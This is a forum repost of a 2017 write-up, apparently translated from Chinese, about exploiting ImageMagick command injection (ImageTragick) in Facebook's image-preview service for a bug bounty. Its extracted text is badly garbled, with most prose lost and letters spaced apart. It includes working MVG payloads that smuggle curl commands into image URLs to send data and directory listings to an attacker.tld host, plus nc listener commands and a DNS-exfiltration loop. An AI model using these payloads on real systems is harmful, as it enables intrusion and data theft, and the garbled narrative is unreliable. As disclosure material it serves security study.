搜索

[10967] 2017-01-24_看我如何发现Facebook的ImageMagick漏洞并获4万美元赏金

文档创建者:s7ckTeam
浏览次数:16
最后更新:2025-01-18
2017-01-24_看我如何发现Facebook的ImageMagick漏洞并获4万美元赏金 F a c e b o o k I m a g e M a g i c k 4 c l o u d s   F r e e B u f   2 0 1 7 - 0 1 - 2 4 I m a g e M a g i c k   R C E 4 使 使 I m a g e M a g i c k s t e w i e H a c k e r O n e M a i l . R u M a i l . R u I m a g e M a g i c k   M a i l . R u N i k o l a y   E r m i s h k i n I m a g e M a g i c k F a c e b o o k I m a g e M a g i c k F B I m a g e M a g i c k F B I m a g e M a g i c k I m a g e M a g i c k 9 0 G P L   广 使 p h p I M a g i c k M a g i c k W a n d   f o r   P H P   p h M a g i c k I m a g e M a g i c k , j a v a J M a g i c k , p y t h o n P y t h o n M a g i c k W a n d   使 I m a g e M a g i c k w e b 2 0 1 6 4 I m a g e M a g i c k R C E h t t p s : / / i m a g e t r a g i c k . c o m / e x p l o i t - d b h t t p s : / / w w w . e x p l o i t - d b . c o m / e x p l o i t s / 3 9 7 6 7 / P O C h t t p s : / / g i t h u b . c o m / I m a g e T r a g i c k / P o C s
1 0 f a c e b o o k ) f a c e b o o k S h a r e   o n   F a c e b o o k h t t p s : / / w w w . f a c e b o o k . c o m / d i a l o g / f e e d ? a p p _ i d = A P P _ I D & l i n k = l i n k . e x a m p l e . t l d & p i c t u r e = h t t p % 3 A % 2 F % 2 F a t t a c k e r . t l d % 2 F e x p l o i t . p n g & n a m e = n e w s _ n a m e & c a p t i o n = n e w s _ c a p t i o n & d e s c r i p t i o n = n e w s _ d e s c r i o t i o n & r e d i r e c t _ u r i = h t t p % 3 A % 2 F % 2 F w w w . f a c e b o o k . c o m & e x t = 1 4 7 6 5 6 9 7 6 3 & h a s h = A e b i d 3 v Z F d h 4 U F 1 H p i c t u r e u r l u r l G o o g l e h t t p s : / / w w w . g o o g l e . c o m / i m a g e s / e r r o r s / r o b o t . p n g F a c e b o o k h t t p s : / / e x t e r n a l . f h e n 1 - 1 . f n a . f b c d n . n e t / s a f e _ i m a g e . p h p ? d = A Q D a e W q 2 F n 1 U j s 4 P & w = 1 5 8 & h = 1 5 8 & u r l = h t t p s % 3 A % 2 F % 2 F w w w . g o o g l e . c o m % 2 F i m a g e s % 2 F e r r o r s % 2 F r o b o t . p n g & c f s = 1 & u p s c a l e = 1 & _ n c _ h a s h = A Q D 2 u v q I g A d X g W y b
S S R F f a c e b o o k f a c e b o o k e x t e r n a l h i t / 1 . 1 . 3 1 . 1 3 . 9 7 . *   n c   - l v v v   8 0 8 8 C o n n e c t i o n   f r o m   3 1 . 1 3 . 9 7 . *   p o r t   8 0 8 8   [ t c p / r a d a n - h t t p ]   a c c e p t e d   G E T   / e x p l o i t . p n g ? d d f a d s v d b v   H T T P / 1 . 1   U s e r - A g e n t :   f a c e b o o k e x t e r n a l h i t / 1 . 1 ( + h t t p : / / w w w . f a c e b o o k . c o m / e x t e r n a l h i t _ u a t e x t . p h p )   A c c e p t :   * / *   A c c e p t - E n c o d i n g :   d e f l a t e ,   g z i p   H o s t :   a t t a c k e r . t l d   C o n n e c t i o n :   k e e p - a l i v e S V G S S R F X X E I m a g e T r a g i c k P O C G i t h u b e x p l o i t . p n g p u s h   g r a p h i c - c o n t e x t v i e w b o x   0   0   6 4 0   4 8 0   i m a g e   o v e r   0 , 0   0 , 0   ' h t t p s : / / 1 2 7 . 0 . 0 . 1 / x . p h p ? x = % 6 0 c u r l   " h t t p : / / a t t a c k e r . t l d / "   - d   @ -   >   / d e v / n u l l ` '   p o p   g r a p h i c - c o n t e x t 8 0 . . . . $   n c   - l v v v   8 0 D N S p u s h   g r a p h i c - c o n t e x t v i e w b o x   0   0   6 4 0   4 8 0   i m a g e   o v e r   0 , 0   0 , 0   ' h t t p s : / / 1 2 7 . 0 . 0 . 1 / x . p h p ? x = % 6 0 c u r l   " h t t p : / / r e c o r d _ u n d e r _ a t t a c k e r _ c o n t r o l e d _ n s _ s e r v e r . a t t a c k e r . t l d / "   - d @ -   >   / d e v / n u l l ` '   p o p   g r a p h i c - c o n t e x t I P :   3 1 . 1 3 . * . * ;   N e t N a m e :   L L A 1 - 1 1 N A M E :   r e c o r d _ u n d e r _ a t t a c k e r _ c o n t r o l e d _ n s _ s e r v e r . a t t a c k e r . t l d ,   T y p e :   A
I P W h o i s F A C E B O O K n e t n a m e :   L L A 1 - 1 1 d e s c r :   F a c e b o o k F a c e b o o k ' p i c t u r e ' g o o g l e h t t p s : / / w w w . g o o g l e . c o m / i m a g e s / e r r o r s / r o b o t . p n g I m a g e M a g i c k 使 I m a g e M a g i c k H T T P f a c e b o o k p a y l o a d p u s h   g r a p h i c - c o n t e x t v i e w b o x   0   0   6 4 0   4 8 0   i m a g e   o v e r   0 , 0   0 , 0   ' h t t p s : / / 1 2 7 . 0 . 0 . 1 / x . p h p ? x = % 6 0 f o r   i   i n   $ ( l s   / )   ;   d o   c u r l   " h t t p : / / $ i . a t t a c k e r . t l d / "   - d   @ -   >   / d e v / n u l l ;   d o n e ` ' p o p   g r a p h i c - c o n t e x t p a y l o a d N A M E :   h o m e . a t t a c k e r . t l d ,   T y p e :   A N A M E :   b o o t . a t t a c k e r . t l d ,   T y p e :   2 8   N A M E :   d e v . a t t a c k e r . t l d ,   T y p e :   2 8   N A M E :   b i n . a t t a c k e r . t l d ,   T y p e :   A   N A M E :   u i d = 9 9 ( n o b o d y ) . a t t a c k e r . t l d . ,   T y p e :   2 8 N A M E :   g r o u p s = 9 9 ( n o b o d y ) . a t t a c k e r . t l d . ,   T y p e :   A   N A M E :   g i d = 9 9 ( n o b o d y ) . a t t a c k e r . t l d . ,   T y p e :   A F a c e b o o k c a t / p r o c / v e r s i o n F a c e b o o k F a c e b o o k N e a l c a t / p r o c / v e r s i o n   |   b a s e 6 4 b a s e 3 2 D N S F a c e b o o k 2 0 1 6 . 1 0 . 1 6     0 3 : 3 1   a m         F a c e b o o k ; 2 0 1 6 . 1 0 . 1 8     0 5 : 3 5   p m         F a c e b o o k N e a l P O C
2 0 1 6 . 1 0 . 1 8     0 8 : 4 0   p m         F a c e b o o k P O C 2 0 1 6 . 1 0 . 1 8     1 0 : 3 1   p m         N e a l 2 0 1 6 . 1 0 . 1 9     1 2 : 2 6   a m         N e a l 2 0 1 6 . 1 0 . 1 9     0 2 : 2 8   a m         N e a l 2 0 1 6 . 1 0 . 1 9     0 7 : 4 9   a m         2 0 1 6 . 1 0 . 2 2     0 3 : 3 4   a m         N e a l   2 0 1 6 . 1 0 . 2 8     0 3 : 3 4   a m         F a c e b o o k 4 2 0 1 6 . 1 1 . 0 4     B u g c r o w d 2 0 1 6 . 1 2 . 1 6     * 4 l e m o n . r u F B c l o u d s F r e e B u f . C O M
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理